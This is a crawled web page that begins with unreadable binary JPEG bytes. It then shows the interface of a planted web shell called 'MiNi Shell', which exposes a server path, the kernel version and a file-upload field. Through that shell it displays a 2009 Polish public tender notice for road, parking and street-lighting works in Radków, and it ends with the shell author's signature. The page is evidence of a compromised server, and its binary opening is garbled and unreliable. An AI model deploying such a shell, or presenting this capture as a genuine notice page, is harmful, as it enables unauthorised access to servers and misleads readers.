JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090217/38621-N-2009.html

<p class="kh_header"><b>Radków: Ulepszanie infrastruktury komunikacyjnej Bożanov- Radków:przebudowa drogi gminnej od drogi wojewódzkiej nr 387 do granicy państwa, przebudowa parkingu, budowa oświetlenia ulicznego -  Zalew w Radkowie</b><br>
<b>Numer ogłoszenia: 38621 - 2009; data zamieszczenia: 17.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Radków , ul. Rynek 1, 57-420 Radków, woj. dolnośląskie, tel. 074 8735000, faks 074 8735015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radkowklodzki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ulepszanie infrastruktury komunikacyjnej Bożanov- Radków:przebudowa drogi gminnej od drogi wojewódzkiej nr 387 do granicy państwa, przebudowa parkingu, budowa oświetlenia ulicznego -  Zalew w Radkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest ulepszanie infrastruktury komunikacyjnej Bożanov- Radków:przebudowa drogi gminnej od drogi wojewódzkiej nr 387 do granicy państwa, przebudowa parkingu, budowa oświetlenia ulicznego -  Zalew w Radkowie o nw zakresie prac:
- długość przebudowanego odcinka 1612mb
- szerokość jezdni 4,0 - 5,5m
- powierzchnia parkingu w tym nawierzchnie utwardzone, pobocza i zieleńce - 0,77ha 
W zakresie robót:
roboty rozbiórkowe:
rozebranie krawężników betonowych wraz z ławami betonowymi - 3144mb
frezowanie istniejącej nawierzchni bitumicznej - 11416,5m2
rozebranie istniejącej podbudowy - 4027,5m2
czyszczenie rowów - 460 mb 
wykonanie nawierzchni chodników z kostki betonowej - 748,5m2
wykonanie nawierzchni miejsc postojowychz kostki betonowej - 2701,5m2
ustawienie krawężników betonowych na ławie betonowej - 3092,5mb
ustawienie obrzeży betonowych na ławie betonowej - 1065,4mb
wyrównanie podbudowy masami mineralno - asfaltowymi - 852,0Mg 
wzmocnienie podbudowy geokompozytem - 1972,75m2
wykonanie nowej nawierzchni bitumicznej - warstwa wiążąca gr. 6cm - 8582,67m2
wykonanie nowej nawierzchni bitumicznej - warstwa ścieralna gr. 4cm -  12014,25m2
Budowa i przebudowa istniejących przepustów pod drogą i zjazdami - 73m wraz ze ściankami czołowymi betonowymi
budowa  murów kamiennych -  91,8m3 
ustawienie barier energochłonnych - 88m
W zakresie wykonania oświetlenia ulicznego:
wykopy ręczne pod kable - 750m,
wykopy mechaniczne pod kable - 2070 m,
położenie kabli elektrycznych,
postawienie słupów oświetleniowych ( drogowych) wraz z lampami - 36 szt.
postawienie słupów oświetleniowych ( parkowych) wraz z lampami - 47 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.10.00-8, 45.23.31.20-6, 45.23.14.00-6, 45.31.61.10-9, 45.23.14.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 100.000,00 zł, słownie: sto tysięcy złotych,zgodnie z art. 45 ustawy prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne zgodnie z art. 22 ustawy Prawo zamówień publicznych mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie        zamówienia;
4.nie podlegają wykluczeniu z postępowania udzielenie zamówienia  zgodnie z art. 24  ustawy Prawo  zamówień publicznych;

Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu:
O zamówienie publiczne mogą się ubiegać Wykonawcy, którzy spełniają następujące warunki:
1.posiadają ubezpieczenie od odpowiedzialności cywilnej (deliktowej i kontraktowej) w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia co najmniej 2.000.000,00 PLN; dysponują środkami finansowymi w wysokości minimum 2.000.000,00 PLN na realizację zadania;
2.dysponują:
-  osobami z niezbędnymi uprawnieniami, zgodnie z wymogami prawa budowlanego w zakresie objętym zamówieniem i należącymi do Okręgowej Izby Inżynierów Budownictwa, które będą pełniły funkcje kierowników robót : branża elektryczna w specjalności instalacyjno-inżynieryjnej w zakresie sieci i instalacji elektrycznych oraz minimum 1 pracownikiem z uprawnieniami do wykonywania samodzielnych funkcji kierownika budowy robót drogowych.
3.zrealizowali w ciągu ostatnich 5 lat co najmniej 3 zadania o wartości 2.000.000,00 zł ( każde) w zakresie budowy lub przebudowy dróg w ramach których wykonano nawierzchnie z kostki betonowej i nawierzchnie bitumiczne, w tym jedno zadanie w ramach którego wykonano co najmniej 10 tys. m2  nawierzchni z mieszanek mineralno - asfaltowych.
4.udzielą gwarancji na wykonane roboty - 36 miesięcy.
5.Dysponują narzędziami i urządzeniami do wykonania zamówienia zgodnie z poniższym wykazem:
1) wytwórnia mas bitumicznych ( posiadają własną wytwórnię lub pisemne zapewnienie od dostawcy, że masa zostanie dostarczona w terminie i  w ilości  niezbędnej do realizacji zadania)
2) koparka kołowa,
3) sprężarka pneumatyczna z młotem,
4) samochód samowyładowawczy 12 t - szt 2,
5) walec drogowy stalowy gładki,
6) walec drogowy wibracyjny,
 7) układarka mas bitumicznych,
 8) skrapiarka,
 9) szczotka mechaniczna,
 10) spawarka z agregatem,
 11) zagęszczarka płytowa,
12) pozostały sprzęt ogólnie stosowany w robotach drogowych.
     
W celu potwierdzenia spełnienia powyższego warunku Wykonawcy są zobowiązani     przedłożyć wykaz narzędzi i urządzeń ( załącznik nr 6 do siwz) do wykonania zamówienia, którymi dysponują z podaniem informacji czy sprzęt użyty do realizacji zamówienia jest własnością wykonawcy, wynajęty, dzierżawiony, użyczony itp. Jeśli ww. sprzęt nie będzie własnością Wykonawcy zobowiązany jest on załączyć do wykazu oświadczenia właściciela,  że wynajmie sprzęt lub sprzeda masę min- asf. na potrzeby realizacji przedmiotowego zadania.

Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu nastąpi poprzez analizę dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, metodą /spełnia - nie spełnia/..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia warunków udziału w postępowaniu Wykonawca składa następujące oświadczenia i dokumenty:
1.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do   ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2.aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4.Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wymaganą wysokość posiadanych środków lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.oświadczenie o spełnieniu warunków wynikających z art. 22 ust.1 i i nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1  ustawy Prawo zamówień publicznych - według załącznika Nr 2 do SIWZ,
6.polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,
7.wykaz personelu odpowiedzialnego  za realizację zamówienia - załącznik nr 4 do siwz,
8. wykaz robót zrealizowanych w okresie ostatnich 5 lat - załącznik nr 5, wraz z referencjami od poprzednich zamawiających potwierdzającymi, że roboty zostały wykonane z należytą starannością.
9.wypełniony Formularz Ofertowy- załącznik nr 1 wraz z kosztorysami ofertowymi     (załącznik nr 1A  i 1B do siwz), sporządzony zgodnie z przedmiarami robót oraz  specyfikacjami technicznymi,
10. wykaz narzędzi i urządzeń ( załącznik nr 6  do siwz) niezbędnych  do wykonania  zamówienia, z podaniem informacji czy sprzęt użyty do realizacji zamówienia jest własnością wykonawcy czy wynajęty,
11.upoważnienie do podpisywania oferty oraz innych dokumentów  związanych z   postępowaniem przetargowym -załącznik nr 7 do siwz.
12.dane dotyczące podwykonawców ( jeśli dotyczą)  i zakres powierzonych im prac do  wykonania. Jeżeli wykonawca zamierza  użyć podwykonawców , musi wykazać na załączniku nr 8 ich nazwę, rodzaj powierzonej części zamówienia oraz załączyć do oferty zobowiązanie podwykonawcy/ów o gotowości do współpracy przy realizacji przedmiotowego zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.radkow.biuletyn.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy, Rynek 1,57-420 Radków, pok. nr 2b, od poniedziałku do piątku w godzinach od 8.00-16.00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy, Rynek 1, 57-420 Radków, pok. nr 10 ( sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego
w ramach Programu Operacyjnego Współpracy Transgranicznej

Creat By MiNi SheLL
Email: jattceo@gmail.com